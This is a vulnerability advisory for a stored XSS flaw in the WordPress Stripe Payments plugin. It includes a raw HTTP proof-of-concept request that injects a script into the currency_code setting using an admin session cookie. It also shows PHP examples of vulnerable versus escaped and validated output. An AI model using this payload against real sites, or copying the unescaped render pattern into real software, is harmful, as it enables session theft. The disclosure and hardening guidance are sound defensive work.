## Vulnerability overview

Vulnerability name: WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS
EDB-ID: 49354
Author: Park Won Seok
Type: Webapps
Platform: PHP
Date: 2021-01-05
Description: A stored cross-site scripting (XSS) vulnerability was found in the WordPress plugin stripe-payments (Ver. 2.0.39). The vulnerable parameter is "AcceptStripePayments-settings[currency_code]".

## Affected scope

Affected version: Stripe Payments plugin version 2.0.39
Test environment: Windows 10 x64

## Remediation

Recommendation: Update to the latest version of the Stripe Payments plugin to fix this stored XSS vulnerability.

## POC code

```plaintext
Exploit Title: WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS
Date: 04-01-2021
Software Link: https://wordpress.org/plugins/stripe-payments/#developers
Exploit Author: Park Won Seok
Contact: kkjng39@gmail.com
Category: Webapps
Version: stripe-payments (Ver. 2.0.39)
Tested on: Windows 10 x64

description: A Stored Cross-site scripting (XSS) was discovered in wordpress plugins stripe-payments (Ver. 2.0.39)
Vulnerability parameters : "AcceptStripePayments-settings[currency_code]" have Cross-Site Scripting.

POC - Stored Cross-Site Scripting

POST /wp-admin/options.php HTTP/1.1
Host: localhost
Content-Length: 5786
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.31.131/wp-admin/edit.php?post_type=products&page=stripe-payments-settings
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.9,en;q=0.8
Cookie: wordpress_5b1d751a3da8a97505638936b7963ae=root%7C1609074082%7C6vG1LxkNE1t2BmRmyy21wfVgpGnt1QfEhEWLDGHf%7C508cb8bc44cd6f wordpress_test_cookie=WP_CookieCheck; wordpress_logged_in_5b1d751a3da8a97505638936b7963ae=root%7C1609074082%7C6vG1LxkNE1t2BmRmyy21wfVgpGnt1QfEhEWLDGHf%7C3e51 asp_transient_id=36985c314be2b5205e14586c592c87d0; wp-settings-1=fold%3D0o26editort%3Dhtml%26posts_list_mode%3Dlist; wp-settings-time-1=1608993490
Connection: close

wp-asp-urllashgeneralOption_page=AcceptStripePayments-settings-group&action=update&advanced_options%5B%5D=edit.php%3Fpost_type%3Dasp-products%26page%3Dstripe-payments-settings%26AcceptStripePayments-settings%5Bcheckout_url%5D=http%3A%2F%2F192.168.31.131%2Fproducts%2F%26AcceptStripePayments-settings%5Bcheckout_products%5D%5Bpage_url_value%5D=http%3A%2F%2F192.168.31.131%2Fproducts%2F%26AcceptStripePayments-settings%5Bcurrency_code%5D=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&AcceptStripePayments-settings%5Bcurrency_symbol%5D=%24&AcceptStripePayments-settings%5Bbutton_text%5D=Buy+Now&AcceptStripePayments-settings%5Bpopup_button_text%5D=Pay+%25s&AcceptStripePayments-settings%5Bcheckout_lang%5D=en&AcceptStripePayments-settings%5Bpopup_default_country%5D=&AcceptStripePayments-settings%5Bapi_publishable_key%5D=&AcceptStripePayments-settings%5Bapi_secret_key%5D=&AcceptStripePayments-settings%5Bapi_publishable_key_test%5D=&AcceptStripePayments-settings%5Bapi_secret_key_test%5D=&AcceptStripePayments-settings%5Bbuyer_email%5D=&AcceptStripePayments-settings%5Bfrom_email_address%5D=test%2B3sales%40buyr-domain.com%26AcceptStripePayments-settings%5Bbuyer_email_subject%5D=Thank+you+for+your+purchase&AcceptStripePayments-settings%5Bapi_publishable_key%5D=&AcceptStripePayments-settings%5Bapi_secret_key%5D=&AcceptStripePayments-settings%5Bbuyer_email_subject%5D=Thank+you+for+your+purchase%21+You+ordered+the+following+item%28%29%3A%0D%0A&google.com+%3Chttp%3A%2F%2F4naver.com%2F%26AcceptStripePayments-settings%5Bseller_email%5D=test%3Dtext%26AcceptStripePayments-settings%5Bseller_email_subject%5D=Notification+of+product+sale&AcceptStripePayments-settings%5Bseller_email_body%5D=Dear+seller%0D%0AYou%0D%0AThank+you+for+your+purchase%21+You+ordered+the+following+item%28%29%3A%0D%0A%0D%0A%28product_d%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%
```
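The bug class behind this advisory is a settings value that is stored via `options.php` and later echoed into the admin page without validation or escaping. The following is an added illustration written for this page, not the plugin's own code: the `demo_*` function names and the currency allowlist are hypothetical, while the option name `AcceptStripePayments-settings` and the group `AcceptStripePayments-settings-group` are taken from the POC request above, and `register_setting`, `get_option`, `sanitize_text_field`, `add_settings_error` and `esc_attr` are standard WordPress APIs.

```php
<?php
// Added example, not from the Stripe Payments plugin. Shows the vulnerable
// pattern beside a hardened one. Function names prefixed demo_ are hypothetical.

// Vulnerable pattern: the stored option is written into an attribute unescaped,
// so a value saved as "<script>...</script>" executes for every admin who
// opens the settings page (stored XSS, as in the advisory).
function demo_render_currency_vulnerable() {
    $opts = get_option( 'AcceptStripePayments-settings', array() );
    $code = isset( $opts['currency_code'] ) ? $opts['currency_code'] : '';
    echo '<input type="text" name="AcceptStripePayments-settings[currency_code]" value="' . $code . '">';
}

// Hardened step 1: validate on save. options.php runs sanitize_callback before
// the option group is stored, so a rejected value never reaches the database.
function demo_sanitize_settings( $input ) {
    $prev  = get_option( 'AcceptStripePayments-settings', array() );
    $clean = is_array( $prev ) ? $prev : array();
    // Hypothetical allowlist of ISO 4217 codes; a real plugin would use its full list.
    $allowed = array( 'USD', 'EUR', 'GBP', 'JPY', 'KRW' );
    $raw  = isset( $input['currency_code'] ) ? $input['currency_code'] : '';
    $code = strtoupper( sanitize_text_field( $raw ) );
    if ( in_array( $code, $allowed, true ) ) {
        $clean['currency_code'] = $code;
    } else {
        // Keep the previous value and surface an admin notice instead of storing markup.
        add_settings_error( 'AcceptStripePayments-settings', 'bad_currency',
            'Unsupported currency code; the previous value was kept.' );
    }
    // Every other field in the group needs its own rule; omitted for brevity.
    return $clean;
}

function demo_register_settings() {
    register_setting(
        'AcceptStripePayments-settings-group',
        'AcceptStripePayments-settings',
        array( 'type' => 'array', 'sanitize_callback' => 'demo_sanitize_settings' )
    );
}
add_action( 'admin_init', 'demo_register_settings' );

// Hardened step 2: escape on output regardless of what is in the database, so a
// value stored by an older, unsanitized version still cannot execute.
function demo_render_currency_hardened() {
    $opts = get_option( 'AcceptStripePayments-settings', array() );
    $code = isset( $opts['currency_code'] ) ? $opts['currency_code'] : '';
    echo '<input type="text" name="AcceptStripePayments-settings[currency_code]" value="' . esc_attr( $code ) . '">';
}
```

Because the POC request is sent with an administrator's session cookie, the practical impact is that a payload saved by one privileged user fires in the browser of every other user who views the settings page; output escaping is what removes that persistence, and input validation keeps the stored data clean.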